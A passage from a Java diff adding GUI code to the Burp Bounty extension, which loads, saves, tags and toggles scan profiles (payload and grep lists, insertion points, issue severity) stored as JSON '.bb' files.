+ outbound_edge_count.setSelected(true);
+ }
+ if (variationAttributes.contains("initial_body_content")) {
+ initial_body_content.setSelected(true);
+ }
+ if (variationAttributes.contains("content_location")) {
+ content_location.setSelected(true);
+ }
+ if (variationAttributes.contains("limited_body_content")) {
+ limited_body_content.setSelected(true);
+ }
+ if (variationAttributes.contains("canonical_link")) {
+ canonical_link.setSelected(true);
+ }
+ if (variationAttributes.contains("css_classes")) {
+ css_classes.setSelected(true);
+ }
+ if (variationAttributes.contains("location")) {
+ location.setSelected(true);
+ }
+ if (variationAttributes.contains("anchor_labels")) {
+ anchor_labels.setSelected(true);
+ }
+
+ setSelectedInsertionPointType(false);
+ if (insertionPointType.contains(18)) {
+ All.setSelected(true);
+ }
+ if (insertionPointType.contains(65)) {
+ extensionprovided.setSelected(true);
+ }
+ if (insertionPointType.contains(32)) {
+ header.setSelected(true);
+ }
+ if (insertionPointType.contains(36)) {
+ entirebody.setSelected(true);
+ }
+ if (insertionPointType.contains(7)) {
+ paramamf.setSelected(true);
+ }
+ if (insertionPointType.contains(1)) {
+ parambody.setSelected(true);
+ }
+ if (insertionPointType.contains(2)) {
+ paramcookie.setSelected(true);
+ }
+ if (insertionPointType.contains(6)) {
+ paramjson.setSelected(true);
+ }
+ if (insertionPointType.contains(33)) {
+ urlpathfolder.setSelected(true);
+ }
+ if (insertionPointType.contains(5)) {
+ parammultipartattr.setSelected(true);
+ }
+ if (insertionPointType.contains(35)) {
+ paramnamebody.setSelected(true);
+ }
+ if (insertionPointType.contains(34)) {
+ paramnameurl.setSelected(true);
+ }
+ if (insertionPointType.contains(64)) {
+ userprovided.setSelected(true);
+ }
+ if (insertionPointType.contains(0)) {
+ paramurl.setSelected(true);
+ }
+ if (insertionPointType.contains(3)) {
+ paramxml.setSelected(true);
+ }
+ if (insertionPointType.contains(4)) {
+ paramxmlattr.setSelected(true);
+ }
+ if (insertionPointType.contains(37)) {
+ urlpathfilename.setSelected(true);
+ }
+ if (insertionPointType.contains(127)) {
+ unknown.setSelected(true);
+ }
+
+ check1.setSelected(casesensitive);
+ check4.setSelected(notresponse);
+ check71.setSelected(iscontenttype);
+ check72.setSelected(isresponsecode);
+ negativeCT.setSelected(negativect);
+ negativeRC.setSelected(negativerc);
+ text4.setText(issuename);
+ textarea1.setText(issuedetail);
+ textarea2.setText(issuebackground);
+ textarea3.setText(remediationdetail);
+ textarea4.setText(remediationbackground);
+ text11.setText(filename);
+ sp1.setValue(maxRedir);
+
+ switch (issueseverity) {
+ case "High":
+ buttonGroup2.setSelected(radio5.getModel(), true);
+ break;
+ case "Medium":
+ buttonGroup2.setSelected(radio6.getModel(), true);
+ break;
+ case "Low":
+ buttonGroup2.setSelected(radio7.getModel(), true);
+ break;
+ case "Information":
+ buttonGroup2.setSelected(radio8.getModel(), true);
+ break;
+ default:
+ break;
+ }
+
+ switch (issueconfidence) {
+ case "Certain":
+ buttonGroup3.setSelected(radio9.getModel(), true);
+ break;
+ case "Firm":
+ buttonGroup3.setSelected(radio10.getModel(), true);
+ break;
+ case "Tentative":
+ buttonGroup3.setSelected(radio11.getModel(), true);
+ break;
+ default:
+ break;
+ }
+ } catch (Exception e) {
+ System.out.println(e.getClass());
+ }
+ }
+
+ public void saveAttackValues() {
+ Header = new ArrayList();
+ variationAttributes = new ArrayList();
+ insertionPointType = new ArrayList();
+ //Save attack with fields values
+ try {
+ //get GUI values
+ Issue newfile = new Issue();
+
+ if (text1.getText().length() >= 35) {
+ newfile.setName(text1.getText().substring(0, 34));
+ } else {
+ newfile.setName(text1.getText());
+ }
+
+ if (textauthor.getText().length() >= 35) {
+ newfile.setAuthor(textauthor.getText().substring(0, 34));
+ } else {
+ newfile.setAuthor(textauthor.getText());
+ }
+
+ if (radio1.isSelected()) {
+ newfile.setScanner(1);
+ } else if (radio2.isSelected()) {
+ newfile.setScanner(2);
+ } else if (radioPR.isSelected()) {
+ newfile.setScanner(3);
+ } else {
+ newfile.setScanner(0);
+ }
+
+ if (replace.isSelected()) {
+ newfile.setPayloadPosition(1);
+ } else if (append.isSelected()) {
+ newfile.setPayloadPosition(2);
+ } else {
+ newfile.setPayloadPosition(1);
+ }
+
+ newfile.setActive(true);
+ List encoders = new ArrayList();
+ List payloads = new ArrayList();
+ List greps = new ArrayList();
+ List tags = new ArrayList();
+
+ newfile.setPayloadsFile(textpayloads.getText());
+ for (int i = 0; i < list1.getModel().getSize(); i++) {
+ Object item = list1.getModel().getElementAt(i);
+ if(!item.toString().isEmpty()){
+ payloads.add(item.toString().replaceAll("\r", "").replaceAll("\n", ""));
+ }
+ }
+ newfile.setPayloads(payloads);
+
+ newfile.setGrepsFile(textgreps.getText());
+ for (int i = 0; i < list2.getModel().getSize(); i++) {
+ Object item = list2.getModel().getElementAt(i);
+ if(!item.toString().isEmpty()){
+ greps.add(item.toString().replaceAll("\r", "").replaceAll("\n", ""));
+ }
+ }
+ newfile.setGreps(greps);
+
+ for (int row = 0; row < model4.getRowCount(); row++) {
+ Header.add(new Headers((String) model4.getValueAt(row, 0), (String) model4.getValueAt(row, 1), (String) model4.getValueAt(row, 2), (String) model4.getValueAt(row, 3), (String) model4.getValueAt(row, 4)));
+ }
+ newfile.setHeader(Header);
+
+ for (int i = 0; i < listtag.getModel().getSize(); i++) {
+ Object item = listtag.getModel().getElementAt(i);
+ if(!item.toString().isEmpty()){
+ tags.add(item.toString().replaceAll("\r", "").replaceAll("\n", ""));
+ }
+ }
+ newfile.setTags(tags);
+
+ for (int i = 0; i < list3.getModel().getSize(); i++) {
+ Object item = list3.getModel().getElementAt(i);
+ if(!item.toString().isEmpty()){
+ encoders.add(item.toString().replaceAll("\r", "").replaceAll("\n", ""));
+ }
+ }
+
+ newfile.setEncoder(encoders);
+ newfile.setCharsToUrlEncode(text5.getText());
+ newfile.setUrlEncode(check8.isSelected());
+ newfile.setExcludeHTTP(excludehttp.isSelected());
+ newfile.setOnlyHTTP(onlyhttp.isSelected());
+ newfile.setContentType(text71.getText());
+ newfile.setResponseCode(text72.getText());
+
+ if (texttime.getText().isEmpty()) {
+ newfile.setTime(texttime.getText());
+ } else {
+ newfile.setTime(texttime.getText());
+ }
+
+ if (textcl.getText().isEmpty()) {
+ newfile.setContentLength(textcl.getText());
+ } else {
+ newfile.setContentLength(textcl.getText());
+ }
+
+ if (radio4.isSelected()) {
+ newfile.setMatchType(1);
+ } else if (radio3.isSelected()) {
+ newfile.setMatchType(2);
+ } else if (radio12.isSelected()) {
+ newfile.setMatchType(3);
+ } else if (radio22.isSelected()) {
+ newfile.setMatchType(4);
+ } else if (radiotime.isSelected()) {
+ newfile.setMatchType(5);
+ } else if (radiocl.isSelected()) {
+ newfile.setMatchType(6);
+ } else if (variationsRadio.isSelected()) {
+ newfile.setMatchType(7);
+ } else if (invariationsRadio.isSelected()) {
+ newfile.setMatchType(8);
+ } else {
+ newfile.setMatchType(0);
+ }
+
+ if (rb1.isSelected()) {
+ newfile.setRedirType(1);
+ } else if (rb2.isSelected()) {
+ newfile.setRedirType(2);
+ } else if (rb3.isSelected()) {
+ newfile.setRedirType(3);
+ } else if (rb4.isSelected()) {
+ newfile.setRedirType(4);
+ } else {
+ newfile.setRedirType(0);
+ }
+
+ if (status_code.isSelected()) {
+ variationAttributes.add("status_code");
+ }
+ if (input_image_labels.isSelected()) {
+ variationAttributes.add("input_image_labels");
+ }
+ if (non_hidden_form_input_types.isSelected()) {
+ variationAttributes.add("non_hidden_form_input_types");
+ }
+ if (page_title.isSelected()) {
+ variationAttributes.add("page_title");
+ }
+ if (visible_text.isSelected()) {
+ variationAttributes.add("visible_text");
+ }
+ if (button_submit_labels.isSelected()) {
+ variationAttributes.add("button_submit_labels");
+ }
+ if (div_ids.isSelected()) {
+ variationAttributes.add("div_ids");
+ }
+ if (word_count.isSelected()) {
+ variationAttributes.add("word_count");
+ }
+ if (content_type.isSelected()) {
+ variationAttributes.add("content_type");
+ }
+ if (outbound_edge_tag_names.isSelected()) {
+ variationAttributes.add("outbound_edge_tag_names");
+ }
+ if (whole_body_content.isSelected()) {
+ variationAttributes.add("whole_body_content");
+ }
+ if (etag_header.isSelected()) {
+ variationAttributes.add("etag_header");
+ }
+ if (visible_word_count.isSelected()) {
+ variationAttributes.add("visible_word_count");
+ }
+ if (content_length.isSelected()) {
+ variationAttributes.add("content_length");
+ }
+ if (header_tags.isSelected()) {
+ variationAttributes.add("header_tags");
+ }
+ if (tag_ids.isSelected()) {
+ variationAttributes.add("tag_ids");
+ }
+ if (comments.isSelected()) {
+ variationAttributes.add("comments");
+ }
+ if (line_count.isSelected()) {
+ variationAttributes.add("line_count");
+ }
+ if (set_cookie_names.isSelected()) {
+ variationAttributes.add("set_cookie_names");
+ }
+ if (last_modified_header.isSelected()) {
+ variationAttributes.add("last_modified_header");
+ }
+ if (first_header_tag.isSelected()) {
+ variationAttributes.add("first_header_tag");
+ }
+ if (tag_names.isSelected()) {
+ variationAttributes.add("tag_names");
+ }
+ if (input_submit_labels.isSelected()) {
+ variationAttributes.add("input_submit_labels");
+ }
+ if (outbound_edge_count.isSelected()) {
+ variationAttributes.add("outbound_edge_count");
+ }
+ if (initial_body_content.isSelected()) {
+ variationAttributes.add("initial_body_content");
+ }
+ if (content_location.isSelected()) {
+ variationAttributes.add("content_location");
+ }
+ if (limited_body_content.isSelected()) {
+ variationAttributes.add("limited_body_content");
+ }
+ if (canonical_link.isSelected()) {
+ variationAttributes.add("canonical_link");
+ }
+ if (css_classes.isSelected()) {
+ variationAttributes.add("css_classes");
+ }
+ if (location.isSelected()) {
+ variationAttributes.add("location");
+ }
+ if (anchor_labels.isSelected()) {
+ variationAttributes.add("anchor_labels");
+ }
+
+ newfile.setVariationAttributes(variationAttributes);
+
+ if (All.isSelected()) {
+ insertionPointType.add(18);
+ insertionPointType.add(65);
+ insertionPointType.add(32);
+ insertionPointType.add(36);
+ insertionPointType.add(7);
+ insertionPointType.add(1);
+ insertionPointType.add(2);
+ insertionPointType.add(6);
+ insertionPointType.add(33);
+ insertionPointType.add(5);
+ insertionPointType.add(35);
+ insertionPointType.add(34);
+ insertionPointType.add(64);
+ insertionPointType.add(0);
+ insertionPointType.add(3);
+ insertionPointType.add(4);
+ insertionPointType.add(37);
+ insertionPointType.add(127);
+ }
+
+ if (extensionprovided.isSelected()) {
+ insertionPointType.add(65);
+ }
+ if (header.isSelected()) {
+ insertionPointType.add(32);
+ }
+ if (entirebody.isSelected()) {
+ insertionPointType.add(36);
+ }
+ if (paramamf.isSelected()) {
+ insertionPointType.add(7);
+ }
+ if (parambody.isSelected()) {
+ insertionPointType.add(1);
+ }
+ if (paramcookie.isSelected()) {
+ insertionPointType.add(2);
+ }
+ if (paramjson.isSelected()) {
+ insertionPointType.add(6);
+ }
+ if (urlpathfolder.isSelected()) {
+ insertionPointType.add(33);
+ }
+ if (parammultipartattr.isSelected()) {
+ insertionPointType.add(5);
+ }
+ if (paramnamebody.isSelected()) {
+ insertionPointType.add(35);
+ }
+ if (paramnameurl.isSelected()) {
+ insertionPointType.add(34);
+ }
+ if (userprovided.isSelected()) {
+ insertionPointType.add(64);
+ }
+ if (paramurl.isSelected()) {
+ insertionPointType.add(0);
+ }
+ if (paramxml.isSelected()) {
+ insertionPointType.add(3);
+ }
+ if (paramxmlattr.isSelected()) {
+ insertionPointType.add(4);
+ }
+ if (urlpathfilename.isSelected()) {
+ insertionPointType.add(37);
+ }
+ if (unknown.isSelected()) {
+ insertionPointType.add(127);
+ }
+ newfile.setInsertionPointType(insertionPointType);
+
+ newfile.setCaseSensitive(check1.isSelected());
+ newfile.setNotResponse(check4.isSelected());
+ newfile.setIsContentType(check71.isSelected());
+ newfile.setIsResponseCode(check72.isSelected());
+ newfile.setNegativeCT(negativeCT.isSelected());
+ newfile.setNegativeRC(negativeRC.isSelected());
+ newfile.setIssueName(text4.getText());
+ newfile.setIssueDetail(textarea1.getText());
+ newfile.setIssueBackground(textarea2.getText());
+ newfile.setRemediationDetail(textarea3.getText());
+ newfile.setRemediationBackground(textarea4.getText());
+ newfile.setMaxRedir((Integer) sp1.getValue());
+
+ if (radio5.isSelected()) {
+ newfile.setIssueSeverity("High");
+ } else if (radio6.isSelected()) {
+ newfile.setIssueSeverity("Medium");
+ } else if (radio7.isSelected()) {
+ newfile.setIssueSeverity("Low");
+ } else if (radio8.isSelected()) {
+ newfile.setIssueSeverity("Information");
+ }
+
+ if (radio9.isSelected()) {
+ newfile.setIssueConfidence("Certain");
+ } else if (radio10.isSelected()) {
+ newfile.setIssueConfidence("Firm");
+ } else if (radio11.isSelected()) {
+ newfile.setIssueConfidence("Tentative");
+ }
+
+ //Save start
+ Gson gson = new Gson();
+
+ JsonArray ijson = new JsonArray();
+ List newjson = gson.fromJson(ijson, new TypeToken>() {
+ }.getType());
+ newjson.add(newfile);
+
+ String json = gson.toJson(newjson);
+
+ //Write JSON String to file
+ FileOutputStream fileStream;
+
+ if (text1.getText().length() >= 35) {
+ fileStream = new FileOutputStream(new File(text11.getText() + "/" + text1.getText().substring(0, 34) + ".bb"));
+ } else {
+ fileStream = new FileOutputStream(new File(text11.getText() + "/" + text1.getText()) + ".bb");
+ }
+
+ OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8");
+ writer.write(json);
+ writer.close();
+ fileStream.close();
+
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+
+ public void setSelectedVariations(boolean state) {
+ status_code.setSelected(state);
+ input_image_labels.setSelected(state);
+ non_hidden_form_input_types.setSelected(state);
+ page_title.setSelected(state);
+ visible_text.setSelected(state);
+ button_submit_labels.setSelected(state);
+ div_ids.setSelected(state);
+ word_count.setSelected(state);
+ content_type.setSelected(state);
+ outbound_edge_tag_names.setSelected(state);
+ whole_body_content.setSelected(state);
+ etag_header.setSelected(state);
+ visible_word_count.setSelected(state);
+ content_length.setSelected(state);
+ header_tags.setSelected(state);
+ tag_ids.setSelected(state);
+ comments.setSelected(state);
+ line_count.setSelected(state);
+ set_cookie_names.setSelected(state);
+ last_modified_header.setSelected(state);
+ first_header_tag.setSelected(state);
+ tag_names.setSelected(state);
+ input_submit_labels.setSelected(state);
+ outbound_edge_count.setSelected(state);
+ initial_body_content.setSelected(state);
+ content_location.setSelected(state);
+ limited_body_content.setSelected(state);
+ canonical_link.setSelected(state);
+ css_classes.setSelected(state);
+ location.setSelected(state);
+ anchor_labels.setSelected(state);
+ }
+
+ public void setEnabledVariations(boolean state) {
+ Attributes.setEnabled(state);
+ status_code.setEnabled(state);
+ input_image_labels.setEnabled(state);
+ non_hidden_form_input_types.setEnabled(state);
+ page_title.setEnabled(state);
+ visible_text.setEnabled(state);
+ button_submit_labels.setEnabled(state);
+ div_ids.setEnabled(state);
+ word_count.setEnabled(state);
+ content_type.setEnabled(state);
+ outbound_edge_tag_names.setEnabled(state);
+ whole_body_content.setEnabled(state);
+ etag_header.setEnabled(state);
+ visible_word_count.setEnabled(state);
+ content_length.setEnabled(state);
+ header_tags.setEnabled(state);
+ tag_ids.setEnabled(state);
+ comments.setEnabled(state);
+ line_count.setEnabled(state);
+ set_cookie_names.setEnabled(state);
+ last_modified_header.setEnabled(state);
+ first_header_tag.setEnabled(state);
+ tag_names.setEnabled(state);
+ input_submit_labels.setEnabled(state);
+ outbound_edge_count.setEnabled(state);
+ initial_body_content.setEnabled(state);
+ content_location.setEnabled(state);
+ limited_body_content.setEnabled(state);
+ canonical_link.setEnabled(state);
+ css_classes.setEnabled(state);
+ location.setEnabled(state);
+ anchor_labels.setEnabled(state);
+ }
+
+ public void setSelectedInsertionPointType(boolean state) {
+ All.setSelected(state);
+ extensionprovided.setSelected(state);
+ header.setSelected(state);
+ entirebody.setSelected(state);
+ paramamf.setSelected(state);
+ parambody.setSelected(state);
+ paramcookie.setSelected(state);
+ paramjson.setSelected(state);
+ urlpathfolder.setSelected(state);
+ parammultipartattr.setSelected(state);
+ paramnamebody.setSelected(state);
+ paramnameurl.setSelected(state);
+ userprovided.setSelected(state);
+ paramurl.setSelected(state);
+ paramxml.setSelected(state);
+ paramxmlattr.setSelected(state);
+ urlpathfilename.setSelected(state);
+ unknown.setSelected(state);
+ }
+
+ public void setEnabledVarious(boolean state) {
+ jLabel31.setEnabled(state);
+ jLabel30.setEnabled(state);
+ check4.setEnabled(state);
+ check1.setEnabled(state);
+ excludehttp.setEnabled(state);
+ onlyhttp.setEnabled(state);
+ check71.setEnabled(state);
+ check72.setEnabled(state);
+ text71.setEnabled(state);
+ text72.setEnabled(state);
+ negativeCT.setEnabled(state);
+ negativeRC.setEnabled(state);
+ rb1.setEnabled(state);
+ rb2.setEnabled(state);
+ rb3.setEnabled(state);
+ rb4.setEnabled(state);
+ jLabel6.setEnabled(state);
+ jLabel2.setEnabled(state);
+ sp1.setEnabled(state);
+ jLabel28.setEnabled(state);
+ jLabel29.setEnabled(state);
+ jLabel25.setEnabled(state);
+ jLabel24.setEnabled(state);
+ button8.setEnabled(state);
+ textgreps.setEnabled(state);
+ button9.setEnabled(state);
+ button10.setEnabled(state);
+ button11.setEnabled(state);
+ button7.setEnabled(state);
+ list2.setEnabled(state);
+ textfield2.setEnabled(state);
+ }
+
+ public void updatePayloads(String file, Issue issue) {
+
+ //Load file for implement payloads
+ List payloads = new ArrayList();
+ String line;
+ File fileload = new File(file);
+
+ try {
+ BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath()));
+ line = bufferreader.readLine();
+
+ while (line != null) {
+ payloads.add(line);
+ line = bufferreader.readLine();
+ }
+ bufferreader.close();
+ } catch (FileNotFoundException ex) {
+ ex.printStackTrace();
+ } catch (IOException ex) {
+ ex.printStackTrace();
+ }
+ issue.setPayloads(payloads);
+
+ Gson gson = new Gson();
+ String strJson = gson.toJson(issue);
+ FileWriter writer = null;
+ try {
+ writer = new FileWriter(text11.getText() + "/" + issue.getName() + ".bb");
+ writer.write("[" + strJson + "]");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ try {
+ writer.close();
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+
+ public void updateGreps(String file, Issue issue) {
+
+ //Load file for implement payloads
+ List greps = new ArrayList();
+ String line;
+ File fileload = new File(file);
+
+ try {
+ BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath()));
+ line = bufferreader.readLine();
+
+ while (line != null) {
+ greps.add(line);
+ line = bufferreader.readLine();
+ }
+ bufferreader.close();
+ } catch (FileNotFoundException ex) {
+ ex.printStackTrace();
+ } catch (IOException ex) {
+ ex.printStackTrace();
+ }
+ issue.setGreps(greps);
+
+ Gson gson = new Gson();
+ String strJson = gson.toJson(issue);
+ FileWriter writer = null;
+ try {
+ writer = new FileWriter(text11.getText() + "/" + issue.getName() + ".bb");
+ writer.write("[" + strJson + "]");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ try {
+ writer.close();
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+
+ public void initCombo() {
+ //Init main comboBox with file values
+ JsonArray json = initJson();
+ combo1.removeAllItems();
+ if (json != null) {
+ //Names for main combo box
+ for (JsonElement pa : json) {
+ JsonObject bbObj = pa.getAsJsonObject();
+ if (bbObj.get("Active").getAsBoolean()) {
+ combo1.addItem(bbObj.get("Name").getAsString());
+ }
+ }
+ }
+ }
+
+ private List readFile(String filename) {
+ List records = new ArrayList();
+ try {
+ BufferedReader reader = new BufferedReader(new FileReader(filename));
+ String line;
+ while ((line = reader.readLine()) != null) {
+ records.add(line);
+ }
+ reader.close();
+ return records;
+ } catch (Exception e) {
+ System.err.format("Exception occurred trying to read '%s'.", filename);
+ e.printStackTrace();
+ return null;
+ }
+ }
+
+ public JsonArray initJson() {
+ //Init json form filename
+ FileReader fr;
+
+ try {
+ JsonArray data = new JsonArray();
+ File f = new File(filename);
+ if (f.exists() && f.isDirectory()) {
+ for (File file : f.listFiles()) {
+ if (file.getName().endsWith("bb")) {
+ fr = new FileReader(file.getAbsolutePath());
+ JsonReader json = new JsonReader((fr));
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+ fr.close();
+ }
+
+ }
+ }
+ return data;
+ } catch (Exception e) {
+ System.out.println(e.getClass());
+ return null;
+ }
+ }
+
+ public String getClipboardContents() {
+ //Get clipboard contents for implement grep and match paste button
+ String result = "";
+ Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();
+ Transferable contents = clipboard.getContents(null);
+ boolean hasTransferableText = (contents != null) && contents.isDataFlavorSupported(DataFlavor.stringFlavor);
+
+ if (hasTransferableText) {
+ try {
+ result = (String) contents.getTransferData(DataFlavor.stringFlavor);
+ } catch (UnsupportedFlavorException | IOException ex) {
+ System.out.println(ex);
+ ex.printStackTrace();
+ }
+ }
+ return result;
+ }
+
+ public void loadConfigFile() {
+ JFrame parentFrame = new JFrame();
+ JFileChooser fileChooser = new JFileChooser();
+ fileChooser.setDialogTitle("Specify a profiles directory to load");
+ fileChooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY);
+
+ int userSelection = fileChooser.showOpenDialog(parentFrame);
+
+ if (userSelection == JFileChooser.APPROVE_OPTION) {
+ File fileload = fileChooser.getSelectedFile();
+ filename = fileload.getAbsolutePath() + "/";
+ text11.setText(fileload.getAbsolutePath());
+
+ initJson();
+ initCombo();
+ this.callbacks.saveExtensionSetting("filename", filename);
+
+ }
+ }
+
+ public void loadPath(String file, DefaultListModel list) {
+ //Load file for implement payloads
+ DefaultListModel List = list;
+ String line;
+ File fileload = new File(file);
+
+ try {
+ BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath()));
+ line = bufferreader.readLine();
+
+ while (line != null) {
+ List.addElement(line);
+ line = bufferreader.readLine();
+ }
+ bufferreader.close();
+ } catch (FileNotFoundException ex) {
+ ex.printStackTrace();
+ } catch (IOException ex) {
+ ex.printStackTrace();
+ }
+ }
+
+ public void loadPayloadsFile(DefaultListModel list) {
+ //Load file for implement payloads and match load button
+ DefaultListModel List = list;
+ String line;
+ JFrame parentFrame = new JFrame();
+ JFileChooser fileChooser = new JFileChooser();
+ fileChooser.setDialogTitle("Specify a file to load");
+
+ int userSelection = fileChooser.showOpenDialog(parentFrame);
+
+ if (userSelection == JFileChooser.APPROVE_OPTION) {
+ File fileload = fileChooser.getSelectedFile();
+ textpayloads.setText(fileload.getAbsolutePath());
+ try {
+ BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath()));
+ line = bufferreader.readLine();
+
+ while (line != null) {
+ List.addElement(line);
+ line = bufferreader.readLine();
+ }
+ bufferreader.close();
+ } catch (FileNotFoundException ex) {
+ ex.printStackTrace();
+ } catch (IOException ex) {
+ ex.printStackTrace();
+ }
+ }
+ }
+
+ public void loadGrepsFile(DefaultListModel list) {
+ //Load file for implement payloads and match load button
+ DefaultListModel List = list;
+ String line;
+ JFrame parentFrame = new JFrame();
+ JFileChooser fileChooser = new JFileChooser();
+ fileChooser.setDialogTitle("Specify a file to load");
+
+ int userSelection = fileChooser.showOpenDialog(parentFrame);
+
+ if (userSelection == JFileChooser.APPROVE_OPTION) {
+ File fileload = fileChooser.getSelectedFile();
+ textgreps.setText(fileload.getAbsolutePath());
+ try {
+ BufferedReader bufferreader = new BufferedReader(new FileReader(fileload.getAbsolutePath()));
+ line = bufferreader.readLine();
+
+ while (line != null) {
+ List.addElement(line);
+ line = bufferreader.readLine();
+ }
+ bufferreader.close();
+ } catch (FileNotFoundException ex) {
+ ex.printStackTrace();
+ } catch (IOException ex) {
+ ex.printStackTrace();
+ }
+ }
+ }
+
+ public void setEnableDisableProfile(String enable, int tableIndex) {
+
+ Gson gson = new Gson();
+ File f = new File(filename);
+
+ JsonArray json2 = new JsonArray();
+ List newjson = gson.fromJson(json2, new TypeToken>() {
+ }.getType());
+
+ File[] files = f.listFiles(new FilenameFilter() {
+ @Override
+ public boolean accept(File dir, String name) {
+ if (name.toLowerCase().endsWith(".bb")) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+ });
+
+ JTable finalTable = new JTable();
+
+ if (tableIndex == 0) {
+ finalTable = table;
+ } else if (tableIndex == 1) {
+ finalTable = table1;
+ } else if (tableIndex == 2) {
+ finalTable = table2;
+ }
+
+ int[] rows = finalTable.getSelectedRows();
+
+ if (f.exists() && f.isDirectory()) {
+ for (File file : files) {
+ for (Integer row : rows) {
+ try {
+ JsonArray data = new JsonArray();
+ JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath()));
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+
+ Object idata = data.get(0);
+ Issue i = gson.fromJson(idata.toString(), Issue.class);
+ String pname = finalTable.getValueAt(row, 0).toString();
+
+ if (pname.equals(i.getName())) {
+ if (enable.contains("Yes")) {
+ i.setActive(true);
+ finalTable.setValueAt("Yes", row, 1);
+ } else {
+ i.setActive(false);
+ finalTable.setValueAt("No", row, 1);
+ }
+ newjson.clear();
+ newjson.add(i);
+ FileOutputStream fileStream = new FileOutputStream(file.getAbsoluteFile());
+ String fjson = gson.toJson(newjson);
+ OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8");
+ writer.write(fjson);
+ writer.close();
+ }
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+ }
+ }
+ }
+
+ public void setEnableDisableAllProfiles(String enable) {
+
+ Gson gson = new Gson();
+ File f = new File(filename);
+
+ JsonArray json2 = new JsonArray();
+ List newjson = gson.fromJson(json2, new TypeToken>() {
+ }.getType());
+
+ File[] files = f.listFiles(new FilenameFilter() {
+ @Override
+ public boolean accept(File dir, String name) {
+ if (name.toLowerCase().endsWith(".bb")) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+ });
+
+ if (f.exists() && f.isDirectory()) {
+ for (File file : files) {
+ try {
+ JsonArray data = new JsonArray();
+ JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath()));
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+
+ Object idata = data.get(0);
+ Issue i = gson.fromJson(idata.toString(), Issue.class);
+ if (enable.contains("Yes")) {
+ i.setActive(true);
+ } else {
+ i.setActive(false);
+ }
+ newjson.clear();
+ newjson.add(i);
+ FileOutputStream fileStream = new FileOutputStream(file.getAbsoluteFile());
+ String fjson = gson.toJson(newjson);
+ OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8");
+ writer.write(fjson);
+ writer.close();
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+ }
+ String name = newTagCombo2.getItemAt(newTagCombo2.getSelectedIndex());
+ showProfiles(name);
+ }
+
+ public void deleteTagProfiles(String tag) {
+
+ Gson gson = new Gson();
+ File f = new File(filename);
+
+ JsonArray json2 = new JsonArray();
+ List newjson = gson.fromJson(json2, new TypeToken>() {
+ }.getType());
+
+ File[] files = f.listFiles(new FilenameFilter() {
+ @Override
+ public boolean accept(File dir, String name) {
+ if (name.toLowerCase().endsWith(".bb")) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+ });
+
+ if (f.exists() && f.isDirectory()) {
+ for (File file : files) {
+ try {
+ JsonArray data = new JsonArray();
+ JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath()));
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+
+ Object idata = data.get(0);
+ Issue i = gson.fromJson(idata.toString(), Issue.class);
+ List tags = i.getTags();
+ List finaltags = new ArrayList();
+ if (tags != null) {
+ for (String dtag : tags) {
+ if (!dtag.equals(tag)) {
+ finaltags.add(dtag);
+ }
+ }
+ }
+ i.setTags(finaltags);
+ newjson.clear();
+ newjson.add(i);
+ FileOutputStream fileStream = new FileOutputStream(file.getAbsoluteFile());
+ String fjson = gson.toJson(newjson);
+ OutputStreamWriter writer = new OutputStreamWriter(fileStream, "UTF-8");
+ writer.write(fjson);
+ writer.close();
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ }
+ }
+ String name = newTagCombo2.getItemAt(newTagCombo2.getSelectedIndex());
+ showProfiles(name);
+ }
+
+ public void makeTagsFile() {
+
+ Gson gson = new Gson();
+ File f = new File(filename);
+
+ File[] files = f.listFiles(new FilenameFilter() {
+ @Override
+ public boolean accept(File dir, String name) {
+ if (name.toLowerCase().endsWith(".bb")) {
+ return true;
+ } else {
+ return false;
+ }
+ }
+ });
+
+ List tags = new ArrayList();
+ if (f.exists() && f.isDirectory()) {
+ for (File file : files) {
+ try {
+ JsonArray data = new JsonArray();
+ JsonReader json = new JsonReader(new FileReader(file.getAbsolutePath()));
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+
+ Object idata = data.get(0);
+ Issue i = gson.fromJson(idata.toString(), Issue.class);
+ if (i.getTags() != null) {
+ tags.addAll(i.getTags());
+ }
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+
+ }
+ }
+ Set singles = new TreeSet<>();
+ Set multiples = new TreeSet<>();
+
+ for (String x : tags) {
+ if (!multiples.contains(x)) {
+ if (singles.contains(x)) {
+ singles.remove(x);
+ multiples.add(x);
+ } else {
+ singles.add(x);
+ }
+ }
+ }
+
+ tags.clear();
+ tags.addAll(singles);
+ tags.addAll(multiples);
+ File file = new File(filename + "tags.txt");
+ if (!file.exists()) {
+ try {
+ file.createNewFile();
+ } catch (IOException ex) {
+ Logger.getLogger(BurpBountyGui.class.getName()).log(Level.SEVERE, null, ex);
+ }
+ }
+
+ List existenttags = readFile(filename + "tags.txt");
+ for (String tag : tags) {
+ if (!existenttags.contains(tag)) {
+ addNewTag(tag);
+ }
+ }
+ }
+
+ public void showProfiles(String Tag) {
+ JsonArray json = initJson();
+ //model for active profiles
